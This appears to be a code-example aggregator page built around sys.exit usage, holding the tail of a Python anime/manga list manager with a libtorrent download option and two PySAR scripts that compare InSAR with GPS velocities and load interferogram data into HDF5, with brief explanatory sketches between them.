                                dbs[currentdb].save()

                if choice == 'd':
                    try:
                        import libtorrent as lt
                    except ImportError:
                        print(COLORS.fail +\
                        'libTorrent Python bindings not found!' +\
                        COLORS.default)
                        print('To install it check your distribution\'s' +\
                        ' package manager (python-libtorrent for Debian' +\
                        ' based ones) or compile libTorrent with the' +\
                        '--enable-python-binding')
                        continue

                    print(COLORS.header + 'Downloading to current folder...' +\
                    COLORS.default)

                    ses = lt.session()
                    ses.listen_on(6881, 6891)
                    decoded = lt.bdecode(urlopen(picked['url']).read())
                    info = lt.torrent_info(decoded)
                    torrent_handle = ses.add_torrent(info, "./")

                    while (not torrent_handle.is_seed()):
                        status = torrent_handle.status()

                        state_str = [
                            'queued', 'checking', 'downloading metadata',
                            'downloading', 'finished', 'seeding', 'allocating',
                            'checking resume data']
                        sys.stdout.write(
                            '\r\x1b[K%.2f%% complete (down: %.1f kb/s up:' +\
							'%.1f kB/s peers: %d) %s' %
                            (status.progress * 100, status.download_rate / 1000,
                             status.upload_rate / 1000,
                            status.num_peers, state_str[status.state]))
                        sys.stdout.flush()

                        time.sleep(1)
                    print('')
                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][int(
                            args)]['lastwatched'].isdigit():
                                print(COLORS.fail + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(int(dbs[currentdb
                                ].dictionary['items'][int(args)][
                                'lastwatched']) + 1)
                                dbs[currentdb].save()

        elif cmdsplit[0].lower() in ['o', 'oinfo']:
            accepted = False
            if args.split(' ')[0].isdigit():
                if (int(args.split(' ')[0]) >= 0) and (len(dbs[currentdb].dictionary['items']) >= int(args.split(' ')[0])):
                    eid = dbs[currentdb].dictionary['items'][int(args.split(' ')[0])]['aid']
                    etype = dbs[currentdb].dictionary[
                        'items'][int(args.split(' ')[0])]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args.split(' ')[0] +\
                    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                        COLORS.bold + '<Anime, Manga or VN> ' +\
                        COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, True)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii', 'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' +\
                        COLORS.default).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]

                            eid = malanime['id']
                            etype = entry_type
                            accepted = True

            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                        'vn', 'basic,details', '(id=' + str(eid) + ')', '')[
                        'items'][0]

                if os.name == 'nt':
                    for key in deep:
                        deep[key] = deep[key].encode('ascii', 'ignore')

                if etype == 'anime':
                    alternative_title = (' (' + deep['other_titles'].get('japanese') + ')' \
                        if deep['other_titles'].get('japanese', '') != '' \
                        else '') if isinstance(deep['other_titles'].get('japanese', ''), str) \
                        else (' (' + '/'.join(deep['other_titles'].get('japanese', [])) + ')' if \
                        len(deep['other_titles'].get('japanese', [])) > 0 else '')
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'] + alternative_title)
                    if deep['end_date'] != None:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ' + deep['end_date'])
                    else:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ongoing')
                    print(COLORS.bold + 'Type: ' + COLORS.default + deep['type'])
                    if deep.get('classification', None) != None:
                        print(COLORS.bold + 'Classification: ' + COLORS.default +\
                        deep['classification'])
                    print(COLORS.bold + 'Episodes: ' + COLORS.default +\
                    str(deep['episodes']))
                    if deep.get('synopsis', None) != None:
                        print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                        utils.remove_html_tags(deep['synopsis']))
                    print(COLORS.bold + 'Picture available: ' + COLORS.default + \
                        ('yes' if deep['image_url'] != '' else 'no'))
                    print('')
                    if len(deep['OPsongs']) > 0:
                        print(COLORS.bold + 'Opening' + \
                            ('s' if len(deep['OPsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['OPsongs'][0])
                        for song in deep['OPsongs'][1:]: 
                            print((' ' * 10) + song)

                    if len(deep['EDsongs']) > 0:
                        print(COLORS.bold + 'Ending' + \
                            ('s' if len(deep['EDsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['EDsongs'][0])
                        for song in deep['EDsongs'][1:]:
                            print((' ' * 9) + song)
                    print('')
                    print(COLORS.bold + 'Studio' +\
                        ('s' if len(deep['credit']) > 1 else '') + ': ' + \
                        COLORS.default + (' / '.join(deep['credit'])))
                    print('')
                    print(COLORS.bold + 'Character list:' + COLORS.default)
                    for character in deep['characters']:
                        print('\t' + character + ' (voiced by ' + \
                            deep['characters'][character] + ')')
                    print('')
                    print(COLORS.bold + 'Episode list:' + COLORS.default)
                    for ep in sorted(deep['episode_names'], key=lambda x: int(x)):
                        print('\t #' + ep + ' ' + \
                            deep['episode_names'][ep])
                    print('')
                    print(COLORS.bold + 'Staff list:' + COLORS.default)
                    if '--full' in cmdsplit:
                        amount = len(deep['staff'])
                    else: amount = 7
                    i = 0
                    for staff in deep['staff']:
                        print('\t' + staff + ' (' + deep['staff'][staff] + ')')
                        i += 1
                        if i >= amount and len(deep['staff']) > amount:
                            print(COLORS.bold + '\tThere are ' + str(len(deep['staff']) - amount) + \
                             ' other staff members, use "' + COLORS.default + cmd + ' --full"' +\
                             COLORS.bold + ' to see more')
                            break

                elif etype == 'manga':
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'])
                    print(COLORS.bold + 'Chapters: ' + COLORS.default +\
                    str(deep['episodes']))
                    print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                    utils.HTMLEntitiesToUnicode(
                     utils.remove_html_tags(deep['synopsis'])))
                elif etype == 'vn':
                    if len(deep['aliases']) == 0:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'])
                    else:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'] + ' [' +\
                        deep['aliases'].replace('\n', '/') + ']')
                        platforms = []
                    for platform in deep['platforms']:
                        names = {
                            'lin': 'Linux', 'mac': 'Mac', 'win': 'Windows'}
                        if platform in names:
                            platform = names[platform]
                        else:
                            platform = platform[0].upper() + platform[1:]
                        platforms.append(platform)
                    print(COLORS.bold + 'Platforms: ' + COLORS.default +\
                    ('/'.join(platforms)))
                    print(COLORS.bold + 'Released: ' + COLORS.default +\
                    deep['released'])
                    print(COLORS.bold + 'Languages: ' + COLORS.default +\
                    ('/'.join(deep['languages'])))
                    print(COLORS.bold + 'Description: ' + COLORS.default +\
                    deep['description'])

                print('')

        elif cmdsplit[0].lower() in ['add', 'a']:
            online = False
            repeat = True
            title = ''
            entry_type = ''
            while repeat:
                repeat = False
                if title == '':
                    while title == '':
                        title = input(
                            COLORS.bold + '<Title> ' + COLORS.default).replace('\n', '')
                    entry_type = ''
                    while (entry_type in ['anime', 'manga', 'vn']) == False:
                        entry_type = input(
                            COLORS.bold + '<Anime, Manga or VN> ' +\
                            COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, online)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                i = 0
                for result in search_results:
                    if os.name != 'nt':
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'])
                    else:
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'].encode('ascii', 'ignore'))
                    i += 1
                if len(search_results) == 0:
                    print('No results found, searching online..')
                    online = True
                    repeat = True
                    continue

                if not online:
                    print(COLORS.bold + '[O] ' + COLORS.default + 'Search online')
                print(COLORS.bold + '[C] ' + COLORS.default + 'Cancel')
                accepted = False
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                    if which.lower() == 'o':
                        online = True
                        repeat = True
                        accepted = True
                    elif which.lower() == 'c':
                        print('')
                        accepted = True
                    elif which.isdigit():
                        if int(which) <= len(search_results):
                            search_picked = search_results[int(which)]
                            if entry_type in ['anime', 'manga']:
                                deep = ANN.details(search_picked['id'], entry_type)
                            elif entry_type == 'vn':
                                deep = VNDB.get(
                                    'vn', 'basic,details', '(id=' +\
                                     str(search_picked['id']) + ')', '')['items'][0]
                            accepted = True

            if which.lower() == 'c': continue
            genre = ''
            if which == 'n':
                genre = input(
                    COLORS.bold + '<Genre> ' + COLORS.default).replace('\n', '')
            elif entry_type != 'vn':
                genres = ''
                for genre in deep['genres']:
                    genres = genres + genre + '/'
                genre = genres[:-1]

            if which != 'n':
                title = deep['title']

            status = ''
            while status not in ['c', 'w', 'h', 'q', 'd']:
                status = input(COLORS.bold + '<Status> ' + COLORS.default +
                               COLORS.header + '[C/W/H/Q/D] ' +
                               COLORS.default).lower()[:1]

            if status != 'w' and entry_type != 'vn':
                last_ep = input(
                    COLORS.bold + '<Last episode watched> ' +\
                    COLORS.default).replace('\n', '')
            else:
                if entry_type == "anime":
                    last_ep = str(deep['episodes'])
                elif entry_type == "manga":
                    last_ep = str(deep['episodes'])
                else:
                    last_ep = ''

            obs = input(
                COLORS.bold + '<Observations> ' +\
                COLORS.default).replace('\n', '')

            try:
                dbs[currentdb].dictionary['count'] += 1
            except AttributeError:
                dbs[currentdb].dictionary['count'] = 1
            dbs[currentdb].dictionary['items'].append({
                'id': dbs[currentdb].dictionary['count'],
                'type': entry_type,
                'aid': search_picked['id'],
                'name': utils.HTMLEntitiesToUnicode(utils.remove_html_tags(title)),
                'genre': utils.HTMLEntitiesToUnicode(utils.remove_html_tags(genre)),
                'status': status,
                'lastwatched': last_ep,
                'obs': obs})
            rebuild_ids(dbs[currentdb])
            print(COLORS.green + 'Entry added' + COLORS.default + '\n')
        elif cmdsplit[0] == '':
            continue
        else:
            print(COLORS.warning + 'Command not recognized' + COLORS.default)
            continue
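
The 'add' command above keeps prompting until it has a non-empty title, a valid entry type and a valid result index, and it falls back to an online search when the local lookup returns nothing. Below is a minimal, self-contained sketch of that prompt-and-validate loop; it is not taken from the project — the search() stub stands in for the ANN/VNDB lookups and the COLORS formatting is dropped.

import sys

def search(title, online=False):
    # Stand-in for the project's ANN/VNDB lookups: pretend the online
    # search finds one result and the local one finds nothing.
    return [{'id': 1, 'title': title}] if online else []

def pick_entry():
    title = ''
    while title == '':
        title = input('<Title> ').strip()
    online = False
    while True:
        results = search(title, online)
        if not results and not online:
            print('No results found, searching online..')
            online = True
            continue
        for i, result in enumerate(results):
            print('[%d] %s' % (i, result['title']))
        print('[C] Cancel')
        choice = input('Choose> ').strip().lower()
        if choice == 'c':
            return None
        if choice.isdigit() and int(choice) < len(results):
            return results[int(choice)]
        print('Invalid choice, try again.')

if __name__ == '__main__':
    picked = pick_entry()
    if picked is None:
        sys.exit(0)      # nothing selected, exit cleanly
    print('Selected:', picked['title'])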

Example 45

Project: PySAR
Source File: insar_vs_gps.py
View license
def main(argv):

   annotation='yes'
   ann_x=0
   ann_y=0
   annotation_Color='green'
   disp_velocity='yes'
   GPS_InSAR_dif_thr=1
   gps_comp='los_3D'
   uncertainty_fac=1.0
   MarkerSize=5
   try:
      opts, args = getopt.getopt(argv,"v:r:g:G:l:c:t:m:M:s:S:A:B:C:x:y:I:H:u:")

   except getopt.GetoptError:
      Usage() ; sys.exit(1)

   for opt,arg in opts:

      if opt == '-v':
        velocityFile = arg
      elif opt == '-s':
        velocityFile2 = arg
      elif opt == '-g':
        gpsFile = arg
      elif opt == '-r':
        refStation = arg
      elif opt == '-l':
        stationsList = arg.split(',')
      elif opt == '-c':
        coherenceFile = arg
      elif opt == '-t':
        thr = float(arg)
      elif opt == '-m':
        minV=float(arg)
      elif opt == '-M':
        maxV=float(arg)
      elif opt == '-S':
        gps_source = arg
      elif opt == '-A':
        annotation = arg
      elif opt == '-C':
        annotation_Color = arg
      elif opt == '-x':
        ann_x = float(arg)
      elif opt == '-y':
        ann_y = float(arg)
      elif opt == '-I':
        theta = float(arg)
      elif opt == '-H':
        heading = float(arg)
      elif opt == '-G':
        gps_comp = arg
      elif opt == '-u':
        uncertainty_fac = float(arg)
      elif opt == '-B':
        MarkerSize = float(arg)

   try:
     velocityFile
     gpsFile 
     refStation
   except:
     Usage();sys.exit(1)

   try:
     thr
   except:
     thr=0.9

   
   h5file = h5py.File(velocityFile,'r')
   dset=h5file['velocity'].get('velocity')
   insarData=dset[0:dset.shape[0],0:dset.shape[1]]
   k=h5file.keys()

   try:
     h5file2 = h5py.File(velocityFile2,'r')
     dset2=h5file2['velocity'].get('velocity')
     insarData2=dset2[0:dset2.shape[0],0:dset2.shape[1]]
   except:
     print ''
  
   ullon=float(h5file[k[0]].attrs['X_FIRST'])
   ullat=float(h5file[k[0]].attrs['Y_FIRST'])
   lon_step=float(h5file[k[0]].attrs['X_STEP'])
   lat_step=float(h5file[k[0]].attrs['Y_STEP'])
   lon_unit=h5file[k[0]].attrs['Y_UNIT']
   lat_unit=h5file[k[0]].attrs['X_UNIT']

   Length,Width = np.shape(insarData)

   lllat=ullat+Length*lat_step
   urlon=ullon+Width*lon_step
   lat=np.arange(ullat,lllat,lat_step)
   lon=np.arange(ullon,urlon,lon_step)
#################################################################################################
# finding the row and column of the reference GPS station and referencing the InSAR data to this pixel
   Stations,Lat,Lon,Ve,Se,Vn,Sn,Vu,Su=readGPSfile(gpsFile,gps_source)
   idxRef=Stations.index(refStation)
  # Length,Width=np.shape(insarData)
 #  lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
   IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)

#############################################
 #  Stations, gpsData = redGPSfile(gpsFile)
 #  idxRef=Stations.index(refStation)
 #  Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
 #  IDYref,IDXref=find_row_column(Lon,Lat,lon,lat,lon_step,lat_step)   
  ###################################################
 
   if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
        print ''
        print '-----------------------------------------------------------------------'
        print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)       
        if not np.isnan(insarData[IDYref][IDXref]):
             insarData=insarData - insarData[IDYref][IDXref]
        else:
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: nan value for InSAR data at the reference pixel!
               reference station should be a pixel with valid value in InSAR data.
                               
               please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
   else:
        print 'WARNING:'
        print 'Reference GPS station is out of the area covered by InSAR data'
        print 'please select another GPS station as the reference station.'
        sys.exit(1)

#######################################################################################
    
   try:
      stationsList
   except:
      stationsList = Stations 
     # stationsList.remove(refStation)

  # theta=23.0*np.pi/180.0
  # heading=193.0*np.pi/180.0
   try:
      print 'incidence angle = ' + str(theta)
   except:
      print 'using look angle from the velocity file. For more precise results input the incidence angle using option -I.'
      look_n=float(h5file['velocity'].attrs['LOOK_REF1'])
      look_f=float(h5file['velocity'].attrs['LOOK_REF2'])
      theta=(look_n+look_f)/2.
      print 'incidence angle = ' + str(theta) 
  
   try:
      print 'Heading angle = '+str(heading)
   except:
      heading = float(h5file['velocity'].attrs['HEADING'])
      if heading < 0:
          heading=heading+360 

   theta=theta*np.pi/180.0
   heading=heading*np.pi/180.0

   if gps_comp in ['los_3D','LOS_3D','los_3d']:
      unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),-np.cos(theta)]
      gps_comp_txt=' projecting three gps components to LOS' 
   elif gps_comp in ['los_Hz','LOS_HZ','los_hz','los_HZ','LOS_hz']:
      unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]
      gps_comp_txt=' projecting horizontal gps components to LOS'
   elif gps_comp in ['LOS_UP','los_Up','los_up','LOS_up']:
      unitVec=[0,0,-np.cos(theta)]
      gps_comp_txt=' projecting vertical gps components to LOS'
   elif gps_comp in ['gps_up','GPS_UP','GPS_Up','gps_Up']:
      unitVec=[0,0,1]
      gps_comp_txt=' comparing vertical gps with InSAR'
      print '-------------------------'
      print 'Projecting InSAR to vertical'
      insarData=-insarData/np.cos(theta)      
   print '-------------------------'
   print 'unit vector for :' + gps_comp_txt
   print unitVec
   print '-------------------------'
   gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]+unitVec[2]*Vu[idxRef]
   Sr= ((unitVec[0]**2)*Se[idxRef]**2+(unitVec[1]**2)*Sn[idxRef]**2+(unitVec[2]**2)*Su[idxRef]**2)**0.5

  # Sr=((Se[idxRef]**2)*(np.sin(theta)*np.cos(heading))**2+(Sn[idxRef]**2)*(np.sin(heading)*np.sin(theta))**2+(Su[idxRef]**2)*(np.cos(theta)**2))**0.5
   print '######################################################################'
   try:
      h5coh = h5py.File(coherenceFile)
      kh5coh=h5coh.keys()
      dset=h5coh[kh5coh[0]].get(kh5coh[0])
      Coh=dset[0:dset.shape[0],0:dset.shape[1]]
   except:
      print 'No information about the coherence of the points'

   InSAR=[]
   GPS=[]
   InSAR1=[]
   GPS1=[]
   InSAR2=[]
   GPS2=[]
   coherence=[]
   GPSx=[]
   GPSy=[]
   GPSx1=[]
   GPSy1=[]
   GPSx2=[]
   GPSy2=[]
   GPS_station=[]
   GPS_std=[]
   for st in stationsList:
   
      try :
        
        idx=Stations.index(st)

       # Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idx,:]
        gpsLOS=unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]+unitVec[2]*Vu[idx]
        Sg= ((unitVec[0]**2)*Se[idx]**2+(unitVec[1]**2)*Sn[idx]**2+(unitVec[2]**2)*Su[idx]**2)**0.5
       # Sg=((Se[idx]**2)*(np.sin(theta)*np.cos(heading))**2+(Sn[idx]**2)*(np.sin(heading)*np.sin(theta))**2+(Su[idx]**2)*(np.cos(theta)**2))**0.5
        S=(Sg**2+Sr**2)**0.5
        gpsLOS=gpsLOS-gpsLOS_ref
        IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
        insar_velocity=-insarData[IDY][IDX]
        
        try: 
           gpsLOS=insarData2[IDY][IDX]-insarData2[IDYref][IDXref]
           gpsLOS=-1000.0*gpsLOS
        except:
           InSAR_GPS_Copmarison='yes'


        if not np.isnan(insarData[IDY][IDX]):

           print '%%%%%%%%%%%%%%%%%%%%'
           print st
           print 'GPS: ' + str(gpsLOS) + '  +/- '+str(S)  
           print 'INSAR: '+ str(-insarData[IDY][IDX]*1000.0)
           try:
              print 'Coherence: ' + str(Coh[IDY][IDX])
              coherence.append(Coh[IDY][IDX])
              if Coh[IDY][IDX]>thr:
                  InSAR1.append(-insarData[IDY][IDX]*1000.0)
                  GPS1.append(gpsLOS)
              else:
                  InSAR2.append(-insarData[IDY][IDX]*1000.0)
                  GPS2.append(gpsLOS)
                  
           except:
              print 'No information about the coherence is available!'
   
           InSAR.append(-insarData[IDY][IDX]*1000.0)
           GPS.append(gpsLOS)
           GPS_station.append(st)
           GPSx.append(IDX)
           GPSy.append(IDY)
           GPS_std.append(S)
           if np.abs(gpsLOS+insarData[IDY][IDX]*1000.0) < GPS_InSAR_dif_thr:
               GPSx1.append(IDX)
               GPSy1.append(IDY)
           else:
               GPSx2.append(IDX)
               GPSy2.append(IDY)
      except:
        NoInSAR='yes'
  
  # print '######################################################################'
  # print 'GPS:'
  # print GPS
  # print 'InSAR:'
  # print InSAR
  # print 'Coherence:'
  # print coherence
  # print 'Stations'
  # print GPS_station    
  # print '######################################################################'
  # ind0=InSAR.index(0)
    
   InSAR=np.array(InSAR)
   GPS=np.array(GPS)
   GPS_std=np.array(GPS_std)
   lt=len(InSAR)
 #  RMSE=np.sqrt((np.sum((InSAR-GPS)**2,0))/lt)
#   SAD=np.sum(np.abs(InSAR-GPS),0)/np.sum(np.abs(InSAR))
   SAD=np.sum(np.abs(InSAR-GPS),0)/lt
   C1=np.zeros([2,len(InSAR)])
   C1[0][:]=InSAR
   C1[1][:]=GPS
   Cor = np.corrcoef(C1)[0][1]
   print '++++++++++++++++++++++++++++++++++++++++++++++'
   print 'Comparison summary:'
   print ''
   print 'AAD (average absolute difference)= '+str(SAD) + ' [mm/yr]'
   print 'Correlation = '+str(Cor)
   print ''
   print '++++++++++++++++++++++++++++++++++++++++++++++'
###############################################################
   try:
      minV
      maxV
   except:
      minV=np.min([InSAR,GPS])
      maxV=np.max([InSAR,GPS])


   fig = plt.figure()
   ax=fig.add_subplot(111)
#   ax.errorbar(GPS,InSAR,yerr=1.0, xerr=1.0, fmt='o')
   ax.errorbar(GPS,InSAR,yerr=0.0, xerr=uncertainty_fac*GPS_std, fmt='ko',ms=MarkerSize)
   ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'k--')
   ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
   ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
   ax.set_ylim(minV-3,maxV+3)
   ax.set_xlim(minV-3,maxV+3)
   ##
   if annotation in ['yes','y','Y','Yes','YES']:
      for i in range(len(GPS)) :
          ax.annotate(GPS_station[i],xy=(GPS[i], InSAR[i]), xytext=(GPS[i]+ann_x, InSAR[i]+ann_y),color=annotation_Color)

   majorLocator = MultipleLocator(5)
   ax.yaxis.set_major_locator(majorLocator)
   minorLocator   = MultipleLocator(1)
   ax.yaxis.set_minor_locator(minorLocator)
   ax.xaxis.set_minor_locator(minorLocator)
   for tick in ax.xaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   for tick in ax.yaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   plt.tick_params(which='major', length=15,width=2)
   plt.tick_params(which='minor', length=6,width=2)

   figName = 'InSARvsGPS_errorbar.png'
   # plt.savefig(figName,pad_inches=0.0)  
   plt.savefig(figName) 
###############################################################
   
   fig = plt.figure()
   ax=fig.add_subplot(111)
   ax.plot(GPS,InSAR, 'ko',ms=MarkerSize)
   ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'k--')
  # ax.plot([-10,20],[-10,20],'k--')
   ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
   ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
   ax.set_ylim(minV-3,maxV+3)
   ax.set_xlim(minV-3,maxV+3)
  # ax.set_ylim(-10,15)
  # ax.set_xlim(-10,15)
   if annotation in ['yes','y','Y','Yes','YES']:
      for i in range(len(GPS)) :
          ax.annotate(GPS_station[i],xy=(GPS[i], InSAR[i]), xytext=(GPS[i]+ann_x, InSAR[i]+ann_y),color=annotation_Color)

   majorLocator = MultipleLocator(5)
   ax.yaxis.set_major_locator(majorLocator)
   minorLocator   = MultipleLocator(1)
   ax.yaxis.set_minor_locator(minorLocator)
   ax.xaxis.set_minor_locator(minorLocator)
   for tick in ax.xaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   for tick in ax.yaxis.get_major_ticks():
                tick.label.set_fontsize(26)
   plt.tick_params(which='major', length=15,width=2)
   plt.tick_params(which='minor', length=6,width=2)

   figName = 'InSARvsGPS.png'
   # plt.savefig(figName,pad_inches=0.0)  
   plt.savefig(figName)
  
   ######################################################

   try:
     Coh
     fig = plt.figure()
     ax=fig.add_subplot(111)
     ax.errorbar(GPS1,InSAR1,yerr=1.0, xerr=1.0, fmt='o')
     ax.errorbar(GPS2,InSAR2,yerr=1.0, xerr=1.0, fmt='^')
     ax.plot([minV-3,maxV+3],[minV-3,maxV+3],'--')
     ax.set_ylabel('InSAR [mm/yr]',fontsize=26)
     ax.set_xlabel('GPS LOS [mm/yr]',fontsize=26)
     ax.set_ylim(minV-3,maxV+3)
     ax.set_xlim(minV-3,maxV+3)

   except:
     print ''

#   if disp_velocity=='yes':
 #    fig = plt.figure()
  #   ax=fig.add_subplot(111)
    # im=ax.imshow(insarData)
    # cbar = plt.colorbar(im)
    # ax.plot(GPSx,GPSy,'k^',ms=10)
   #  ax.plot(IDXref,IDYref,'ks',ms=10)
    # ax.plot(GPSx1,GPSy1,'gs',ms=10)
    # ax.plot(GPSx2,GPSy2,'rs',ms=10)

   plt.show()
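
The script above relies on the common getopt idiom for sys.exit: call Usage() and sys.exit(1) when option parsing raises getopt.GetoptError, and again when a required variable turns out to be unset (probed by referencing it inside a try block). Here is a compact sketch of the same pattern under assumed names — a hypothetical usage() helper, a reduced -v/-g/-r option list, and a settings dict instead of bare local variables.

import getopt
import sys

def usage():
    print('Usage: example.py -v VELOCITY_FILE -g GPS_FILE -r REF_STATION')

def parse_args(argv):
    try:
        opts, args = getopt.getopt(argv, "v:g:r:")
    except getopt.GetoptError:
        usage()
        sys.exit(1)          # unknown option or missing value
    settings = {}
    for opt, arg in opts:
        if opt == '-v':
            settings['velocity_file'] = arg
        elif opt == '-g':
            settings['gps_file'] = arg
        elif opt == '-r':
            settings['ref_station'] = arg
    for key in ('velocity_file', 'gps_file', 'ref_station'):
        if key not in settings:      # required argument missing
            usage()
            sys.exit(1)
    return settings

if __name__ == '__main__':
    print(parse_args(sys.argv[1:]))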

Example 46

Project: PySAR
Source File: load_data.py
View license
def main(argv):
  try:
    templateFile = argv[1]
  except:
    print '''
    *******************************************

       loading the processed data for PySAR:
	   interferograms (unwrapped and wrapped)
	   coherence files
           geomap.trans file
           DEM (radar and geo coordinate)
       
       Usage: load_data.py TEMPLATEFILE  

    *******************************************         
    '''
    sys.exit(1)

  templateContents = readfile.read_template(templateFile)
  projectName = os.path.basename(templateFile).partition('.')[0]

############# Assign working directory ##############################
  try:     tssarProjectDir = os.getenv('TSSARDIR') +'/'+projectName                     # use TSSARDIR if environment variable exist
  except:  tssarProjectDir = os.getenv('SCRATCHDIR') + '/' + projectName + "/TSSAR"     # FA 7/2015: adopted for new directory structure
 
  print "QQ " + tssarProjectDir
  if not os.path.isdir(tssarProjectDir): os.mkdir(tssarProjectDir)

########### Use defaults if paths not given in template file #########
  try:    igramPath = templateContents['pysar.inputFiles'];  igramPath = check_variable_name(igramPath)
  except: igramPath = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.unw'

  try:    corPath   = templateContents['pysar.corFiles'];      corPath = check_variable_name(corPath)
  except: corPath   = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.cor'

  try:    wrapPath  = templateContents['pysar.wrappedFiles']; wrapPath = check_variable_name(wrapPath)
  except: wrapPath  = os.getenv('SCRATCHDIR') + '/' + projectName + '/PROCESS/DONE/IFGRAM*/filt_*.int'

  #try:    demRdrPath = templateContents['pysar.dem.radarCoord'];  demRdrPath = check_variable_name(demRdrPath)
  #except: 
  #  demRdrList=glob.glob(demRdrPath)
  


###########################################################################
######################### Unwrapped Interferograms ########################

  try:
    if os.path.isfile(tssarProjectDir+'/LoadedData.h5'):
      print '\nLoadedData.h5'+ '  already exists.'
      sys.exit(1)
    igramList = glob.glob(igramPath)    
    k = 'interferograms'
    check_number(k,igramList)	# number check 
    print 'loading interferograms ...'
    igramList,mode_width,mode_length = check_size(k,igramList)	# size check

    h5file = tssarProjectDir+'/LoadedData.h5'
    f = h5py.File(h5file)
    gg = f.create_group('interferograms')
    MaskZero=np.ones([int(mode_length),int(mode_width)])
    for igram in igramList:
      if not os.path.basename(igram) in f:
        print 'Adding ' + igram
        group = gg.create_group(os.path.basename(igram))
        amp,unw,unwrsc = readfile.read_float32(igram)
        MaskZero=amp*MaskZero
 
        dset = group.create_dataset(os.path.basename(igram), data=unw, compression='gzip')
        for key,value in unwrsc.iteritems():
          group.attrs[key] = value

        d1,d2=unwrsc['DATE12'].split('-')
        baseline_file=os.path.dirname(igram)+'/'+d1+'_'+d2+'_baseline.rsc'
        baseline=readfile.read_rsc_file(baseline_file)
        for key,value in baseline.iteritems():
          group.attrs[key] = value
      else:
        print os.path.basename(h5file) + " already contains " + os.path.basename(igram)

    Mask=np.ones([int(mode_length),int(mode_width)])
    Mask[MaskZero==0]=0
    gm = f.create_group('mask')
    dset = gm.create_dataset('mask', data=Mask, compression='gzip')
    f.close()

    ############## Mask file ###############
    print 'writing to Mask.h5\n'
    Mask=np.ones([int(mode_length),int(mode_width)])
    Mask[MaskZero==0]=0
    h5file = tssarProjectDir+'/Mask.h5'
    h5mask = h5py.File(h5file,'w')
    group=h5mask.create_group('mask')
    dset = group.create_dataset(os.path.basename('mask'), data=Mask, compression='gzip')
    for key,value in unwrsc.iteritems():
       group.attrs[key] = value
    h5mask.close()

  except:
    print 'No unwrapped interferogram is loaded.\n'


########################################################################
############################# Coherence ################################
  try:
